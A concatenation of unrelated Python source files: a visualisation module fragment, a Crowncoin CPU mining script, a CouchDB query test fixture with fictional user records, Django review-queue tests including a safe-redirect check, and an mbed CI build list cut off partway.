visualize_util.add_below(center_crop, padding_px), padding_px)
class Quantizer(gtd.GroundTruthData):
"""Quantizes a GroundTruthData to have a maximal number of factors."""
def __init__(self, wrapped_ground_truth_data, max_factors):
"""Constructs a Quantizer.
Args:
wrapped_ground_truth_data: GroundTruthData that should be quantized.
max_factors: integer with the maximal number of factors.
"""
self.wrapped_ground_truth_data = wrapped_ground_truth_data
self.true_num_factors = wrapped_ground_truth_data.factors_num_values
self.fake_num_factors = list(np.minimum(self.true_num_factors, max_factors))
@property
def num_factors(self):
return self.wrapped_ground_truth_data.num_factors
@property
def factors_num_values(self):
return self.fake_num_factors
@property
def observation_shape(self):
return self.wrapped_ground_truth_data.observation_shape
def sample_factors(self, num, random_state):
"""Sample a batch of factors Y."""
factors = np.zeros(shape=(num, self.num_factors), dtype=np.int64)
for i in range(self.num_factors):
factors[:, i] = self._sample_factor(i, num, random_state)
return factors
def _sample_factor(self, i, num, random_state):
return random_state.randint(self.factor_sizes[i], size=num)
def sample_observations_from_factors(self, factors, random_state):
"""Sample a batch of observations X given a batch of factors Y."""
translated_factors = np.copy(factors)
for i in range(self.num_factors):
if self.true_num_factors[i] != self.fake_num_factors[i]:
ratio = float(self.true_num_factors[i]) / float(
self.fake_num_factors[i])
translated_factors[:, i] = np.floor(factors[:, i] * ratio)
return self.wrapped_ground_truth_data.sample_observations_from_factors(
translated_factors, random_state)
COLORS = {
"blue": np.array([66., 103., 210.]) / 255.,
"red": np.array([234., 67., 53.]) / 255.,
"yellow": np.array([251., 188., 4.]) / 255.,
"green": np.array([52., 168., 83.]) / 255.,
"grey": np.array([154., 160., 166.]) / 255.,
}
QUESTION_MARK = [None]
def question_mark():
"""Returns an image of the question mark."""
# Cache the image so it is not always reloaded.
if QUESTION_MARK[0] is None:
with tf.gfile.Open(
resources.get_file("google/abstract_reasoning/data/question_mark.png"),
"rb") as f:
QUESTION_MARK[0] = np.array(Image.open(f).convert("RGB")) * 1.0 / 255.
return QUESTION_MARK[0]
def onehot(indices, num_atoms):
"""Embeds the indices as one hot vectors."""
return np.eye(num_atoms)[indices]
|
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Crowncoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class CrowncoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = CrowncoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9341
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""
Generated with http://www.json-generator.com/
With this pattern:
[
'{{repeat(20)}}',
{
_id: '{{guid()}}',
user_id: "{{index()}}",
name: {
first: "{{firstName()}}",
last: "{{surname()}}"
},
age: "{{integer(18,90)}}",
location: {
state: "{{state()}}",
city: "{{city()}}",
address: {
street: "{{street()}}",
number: "{{integer(10, 10000)}}"
}
},
company: "{{company()}}",
email: "{{email()}}",
manager: "{{bool()}}",
twitter: function(tags) {
if(this.manager)
return;
return "@" + this.email.split("@")[0];
},
favorites: [
"{{repeat(2,5)}}",
"{{random('C', 'C++', 'Python', 'Ruby', 'Erlang', 'Lisp')}}"
]
}
]
"""
import copy
def setup(db, index_type="view", **kwargs):
db.recreate()
db.save_docs(copy.deepcopy(DOCS))
if index_type == "view":
add_view_indexes(db, kwargs)
elif index_type == "text":
add_text_indexes(db, kwargs)
def add_view_indexes(db, kwargs):
indexes = [
["user_id"],
["name.last", "name.first"],
["age"],
[
"location.state",
"location.city",
"location.address.street",
"location.address.number"
],
["company", "manager"],
["manager"],
["favorites"],
["favorites.3"],
["twitter"]
]
for idx in indexes:
assert db.create_index(idx) is True
def add_text_indexes(db, kwargs):
db.create_text_index(**kwargs)
DOCS = [
{
"_id": "71562648-6acb-42bc-a182-df6b1f005b09",
"user_id": 0,
"name": {
"first": "Stephanie",
"last": "Kirkland"
},
"age": 48,
"location": {
"state": "Nevada",
"city": "Ronco",
"address": {
"street": "Evergreen Avenue",
"number": 347
}
},
"company": "Dreamia",
"email": "stephaniekirkland@dreamia.com",
"manager": False,
"twitter": "@stephaniekirkland",
"favorites": [
"Ruby",
"C",
"Python"
],
"test" : [{"a":1}, {"b":2}]
},
{
"_id": "12a2800c-4fe2-45a8-8d78-c084f4e242a9",
"user_id": 1,
"name": {
"first": "Abbott",
"last": "Watson"
},
"age": 31,
"location": {
"state": "Connecticut",
"city": "Gerber",
"address": {
"street": "Huntington Street",
"number": 8987
}
},
"company": "Talkola",
"email": "abbottwatson@talkola.com",
"manager": False,
"twitter": "@abbottwatson",
"favorites": [
"Ruby",
"Python",
"C",
{"Versions": {"Alpha": "Beta"}}
],
"test" : [{"a":1, "b":2}]
},
{
"_id": "48ca0455-8bd0-473f-9ae2-459e42e3edd1",
"user_id": 2,
"name": {
"first": "Shelly",
"last": "Ewing"
},
"age": 42,
"location": {
"state": "New Mexico",
"city": "Thornport",
"address": {
"street": "Miller Avenue",
"number": 7100
}
},
"company": "Zialactic",
"email": "shellyewing@zialactic.com",
"manager": True,
"favorites": [
"Lisp",
"Python",
"Erlang"
],
"test_in": {"val1" : 1, "val2": "val2"}
},
{
"_id": "0461444c-e60a-457d-a4bb-b8d811853f21",
"user_id": 3,
"name": {
"first": "Madelyn",
"last": "Soto"
},
"age": 79,
"location": {
"state": "Utah",
"city": "Albany",
"address": {
"street": "Stockholm Street",
"number": 710
}
},
"company": "Tasmania",
"email": "madelynsoto@tasmania.com",
"manager": True,
"favorites": [[
"Lisp",
"Erlang",
"Python"
],
"Erlang",
"C",
"Erlang"
],
"11111": "number_field",
"22222": {"33333" : "nested_number_field"}
},
{
"_id": "8e1c90c0-ac18-4832-8081-40d14325bde0",
"user_id": 4,
"name": {
"first": "Nona",
"last": "Horton"
},
"age": 61,
"location": {
"state": "Georgia",
"city": "Corinne",
"address": {
"street": "Woodhull Street",
"number": 6845
}
},
"company": "Signidyne",
"email": "nonahorton@signidyne.com",
"manager": False,
"twitter": "@nonahorton",
"favorites": [
"Lisp",
"C",
"Ruby",
"Ruby"
],
"name.first" : "name dot first"
},
{
"_id": "a33d5457-741a-4dce-a217-3eab28b24e3e",
"user_id": 5,
"name": {
"first": "Sheri",
"last": "Perkins"
},
"age": 73,
"location": {
"state": "Michigan",
"city": "Nutrioso",
"address": {
"street": "Bassett Avenue",
"number": 5648
}
},
"company": "Myopium",
"email": "sheriperkins@myopium.com",
"manager": True,
"favorites": [
"Lisp",
"Lisp"
]
},
{
"_id": "b31dad3f-ae8b-4f86-8327-dfe8770beb27",
"user_id": 6,
"name": {
"first": "Tate",
"last": "Guy"
},
"age": 47,
"location": {
"state": "Illinois",
"city": "Helen",
"address": {
"street": "Schenck Court",
"number": 7392
}
},
"company": "Prosely",
"email": "tateguy@prosely.com",
"manager": True,
"favorites": [
"C",
"Lisp",
"Ruby",
"C"
]
},
{
"_id": "659d0430-b1f4-413a-a6b7-9ea1ef071325",
"user_id": 7,
"name": {
"first": "Jewell",
"last": "Stafford"
},
"age": 33,
"location": {
"state": "Iowa",
"city": "Longbranch",
"address": {
"street": "Dodworth Street",
"number": 3949
}
},
"company": "Niquent",
"email": "jewellstafford@niquent.com",
"manager": True,
"favorites": [
"C",
"C",
"Ruby",
"Ruby",
"Erlang"
],
"exists_field" : "should_exist1"
},
{
"_id": "6c0afcf1-e57e-421d-a03d-0c0717ebf843",
"user_id": 8,
"name": {
"first": "James",
"last": "Mcdaniel"
},
"age": 68,
"location": {
"state": "Maine",
"city": "Craig",
"address": {
"street": "Greene Avenue",
"number": 8776
}
},
"company": "Globoil",
"email": "jamesmcdaniel@globoil.com",
"manager": True,
"favorites": None,
"exists_field" : "should_exist2"
},
{
"_id": "954272af-d5ed-4039-a5eb-8ed57e9def01",
"user_id": 9,
"name": {
"first": "Ramona",
"last": "Floyd"
},
"age": 22,
"location": {
"state": "Missouri",
"city": "Foxworth",
"address": {
"street": "Lott Place",
"number": 1697
}
},
"company": "Manglo",
"email": "ramonafloyd@manglo.com",
"manager": True,
"favorites": [
"Lisp",
"Erlang",
"Python"
],
"exists_array" : ["should", "exist", "array1"],
"complex_field_value" : "+-(){}[]^~&&*||\"\\/?:!"
},
{
"_id": "e900001d-bc48-48a6-9b1a-ac9a1f5d1a03",
"user_id": 10,
"name": {
"first": "Charmaine",
"last": "Mills"
},
"age": 43,
"location": {
"state": "New Hampshire",
"city": "Kiskimere",
"address": {
"street": "Nostrand Avenue",
"number": 4503
}
},
"company": "Lyria",
"email": "charmainemills@lyria.com",
"manager": True,
"favorites": [
"Erlang",
"Erlang"
],
"exists_array" : ["should", "exist", "array2"]
},
{
"_id": "b06aadcf-cd0f-4ca6-9f7e-2c993e48d4c4",
"user_id": 11,
"name": {
"first": "Mathis",
"last": "Hernandez"
},
"age": 75,
"location": {
"state": "Hawaii",
"city": "Dupuyer",
"address": {
"street": "Bancroft Place",
"number": 2741
}
},
"company": "Affluex",
"email": "mathishernandez@affluex.com",
"manager": True,
"favorites": [
"Ruby",
"Lisp",
"C",
"C++",
"C++"
],
"exists_object" : {"should": "object"}
},
{
"_id": "5b61abc1-a3d3-4092-b9d7-ced90e675536",
"user_id": 12,
"name": {
"first": "Patti",
"last": "Rosales"
},
"age": 71,
"location": {
"state": "Pennsylvania",
"city": "Juntura",
"address": {
"street": "Hunterfly Place",
"number": 7683
}
},
"company": "Oulu",
"email": "pattirosales@oulu.com",
"manager": True,
"favorites": [
"C",
"Python",
"Lisp"
],
"exists_object" : {"another": "object"}
},
{
"_id": "b1e70402-8add-4068-af8f-b4f3d0feb049",
"user_id": 13,
"name": {
"first": "Whitley",
"last": "Harvey"
},
"age": 78,
"location": {
"state": "Minnesota",
"city": "Trail",
"address": {
"street": "Pleasant Place",
"number": 8766
}
},
"company": None,
"email": "whitleyharvey@fangold.com",
"manager": False,
"twitter": "@whitleyharvey",
"favorites": [
"C",
"Ruby",
"Ruby"
]
},
{
"_id": "c78c529f-0b07-4947-90a6-d6b7ca81da62",
"user_id": 14,
"name": {
"first": "Faith",
"last": "Hess"
},
"age": 51,
"location": {
"state": "North Dakota",
"city": "Axis",
"address": {
"street": "Brightwater Avenue",
"number": 1106
}
},
"company": "Pharmex",
"email": "faithhess@pharmex.com",
"manager": True,
"favorites": [
"Erlang",
"Python",
"Lisp"
]
}
]
|
|
from __future__ import absolute_import
import datetime
import imp
import json
from django.utils import timezone
from django.utils.functional import cached_property
from django.contrib.auth.models import Permission, User
from django.test.client import RequestFactory
from widgy.contrib.review_queue.site import ReviewedWidgySite
from widgy.contrib.review_queue.models import (
ReviewedVersionTracker, ReviewedVersionCommit,
)
from .base import (
RootNodeTestCase, refetch, SwitchUserTestCase,
)
from .test_api import TestApi
from ..models import ReviewedVersionedPage, RawTextWidget
from ..widgy_config import widgy_site
def make_tracker(site, vt_class=ReviewedVersionTracker):
root_node = RawTextWidget.add_root(site, text='first').node
tracker = vt_class.objects.create(working_copy=root_node)
return tracker
def make_commit(site, delta=datetime.timedelta(0), vt_class=ReviewedVersionTracker):
tracker = make_tracker(site, vt_class)
commit = tracker.commit(publish_at=timezone.now() + delta)
return (tracker, commit)
class TestApiReviewed(TestApi):
widgy_site = ReviewedWidgySite()
class ReviewQueueTest(RootNodeTestCase):
widgy_site = widgy_site
def test_review_queue(self):
tracker, commit1 = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
p = Permission.objects.get(codename='change_versioncommit')
user = User.objects.create()
user.user_permissions.add(p)
user.save()
request_factory = RequestFactory()
tracker = refetch(tracker)
self.assertFalse(tracker.get_published_node(request_factory.get('/')))
commit1.approve(user)
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit1.root_node)
commit2 = tracker.commit(publish_at=timezone.now())
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit1.root_node)
commit2.approve(user)
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit2.root_node)
def test_foreign_key_to_proxy_works(self):
"""
If ReviewedVersionTracker is implemented as a proxy, ensure a
foreign key returns a ReviewedVersionTracker instance (instead
of the base model).
"""
tracker, commit1 = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
page = ReviewedVersionedPage.objects.create(
version_tracker=tracker,
)
page = ReviewedVersionedPage.objects.get(pk=page.pk)
self.assertIsInstance(page.version_tracker, ReviewedVersionTracker)
self.assertEqual(page.version_tracker, tracker)
def test_clone_tracker(self):
tracker, _ = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
new_tracker = tracker.clone()
self.assertNotEqual(new_tracker.head.reviewedversioncommit.pk,
tracker.head.reviewedversioncommit.pk)
class ReviewQueueViewsTest(SwitchUserTestCase, RootNodeTestCase):
widgy_site = ReviewedWidgySite()
@cached_property
def urls(self):
urls = imp.new_module('urls')
urls.urlpatterns = self.widgy_site.get_urls()
return urls
def test_commit_view(self):
tracker, first_commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.commit_view, kwargs={
'pk': tracker.pk,
})
with self.as_staffuser() as user:
with self.with_permission(user, 'add', ReviewedVersionCommit):
self.client.post(url, {'approve_it': 1, 'publish_radio': 'now'})
self.assertNotEqual(refetch(tracker).head.reviewedversioncommit, first_commit)
self.assertFalse(refetch(tracker).head.reviewedversioncommit.is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
with self.with_permission(user, 'add', ReviewedVersionCommit):
self.client.post(url, {'approve_it': 1, 'publish_radio': 'now'})
self.assertTrue(refetch(tracker).head.reviewedversioncommit.is_approved)
def test_approve_view(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.approve_view, kwargs={
'pk': tracker.pk,
'commit_pk': commit.pk,
})
commit.message = u'\N{SNOWMAN}'
commit.save()
with self.as_staffuser() as user:
resp = self.client.post(url)
self.assertEqual(resp.status_code, 403)
self.assertFalse(refetch(commit).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = self.client.post(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(refetch(commit).is_approved)
def test_unapprove_view(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.unapprove_view, kwargs={
'pk': tracker.pk,
'commit_pk': commit.pk,
})
commit.approve(self.user)
with self.as_staffuser() as user:
resp = self.client.post(url)
self.assertEqual(resp.status_code, 403)
self.assertTrue(refetch(commit).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = self.client.post(url)
self.assertEqual(resp.status_code, 302)
self.assertFalse(refetch(commit).is_approved)
def test_undo_approvals_view(self):
tracker, commit = make_commit(self.widgy_site)
tracker2, commit2 = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.undo_approvals_view)
commit.approve(self.user)
commit2.approve(self.user)
def doit():
return self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': '/referer/',
})
with self.as_staffuser() as user:
resp = doit()
self.assertEqual(resp.status_code, 403)
self.assertTrue(refetch(commit).is_approved)
self.assertTrue(refetch(commit2).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = doit()
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver/referer/')
self.assertFalse(refetch(commit).is_approved)
self.assertTrue(refetch(commit2).is_approved)
def test_undo_approvals_view_safe_redirect(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.undo_approvals_view)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
response = self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': bad_url,
})
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'//testserver/',
'/url%20with%20spaces/'):
response = self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': good_url,
})
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
def test_published_versiontrackers(self):
vt_class = self.widgy_site.get_version_tracker_model()
tracker = make_tracker(self.widgy_site, vt_class)
self.assertNotIn(tracker, vt_class.objects.published())
commit = tracker.commit(publish_at=timezone.now())
self.assertNotIn(tracker, vt_class.objects.published())
commit.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
tracker2 = make_tracker(self.widgy_site, vt_class)
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
commit2 = tracker2.commit(publish_at=timezone.now())
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
other_commit = tracker.commit(publish_at=timezone.now())
other_commit.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
commit2.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
self.assertIn(tracker2, vt_class.objects.published())
def test_published_stickiness(self):
vt_class = self.widgy_site.get_version_tracker_model()
tracker = make_tracker(self.widgy_site, vt_class)
# One commit is published, the other is approved. Since the same commit
# is not both published and approved, the tracker is not published.
c1 = tracker.commit(publish_at=timezone.now() + datetime.timedelta(days=1))
c1.approve(self.user)
tracker.commit(publish_at=timezone.now())
self.assertNotIn(tracker, vt_class.objects.published())
|
|
#!/usr/bin/env python2
"""
Travis-CI build script
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
################################################################################
# Configure builds here
# "libs" can contain "dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"
build_list = (
{ "target": "LPC1768", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"] },
{ "target": "LPC2368", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC2460", "toolchains": "GCC_ARM", "libs": ["rtos", "usb_host", "usb", "fat"] },
{ "target": "LPC11U24", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "OC_MBUINO", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC11U24_301", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "B96B_F446VE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L053R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L152RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F030R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F031K6", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F042K6", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F070RB", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F072RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F091RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F103RB", "toolchains": "GCC_ARM", "libs": ["rtos", "fat"] },
{ "target": "NUCLEO_F207ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F302R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303K8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303ZE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "NUCLEO_F334R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F401RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F410RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F412ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_L432KC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L476RG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat", "rtos", "usb_host"] },
{ "target": "NUCLEO_L011K4", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "NUCLEO_L031K6", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "NUCLEO_L073RZ", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F446RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F446ZE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F746ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host" ] },
{ "target": "NUCLEO_F767ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "MOTE_L152RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "ELMO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MTS_MDOT_F405RG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_MDOT_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_DRAGONFLY_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "ARCH_MAX", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F051R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F303VC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F334C8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F401VC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F407VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "DISCO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat", "usb_host"] },
{ "target": "DISCO_F469NI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F746NG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F769NI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1114", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "UBLOX_C027", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_501", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC11U68", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
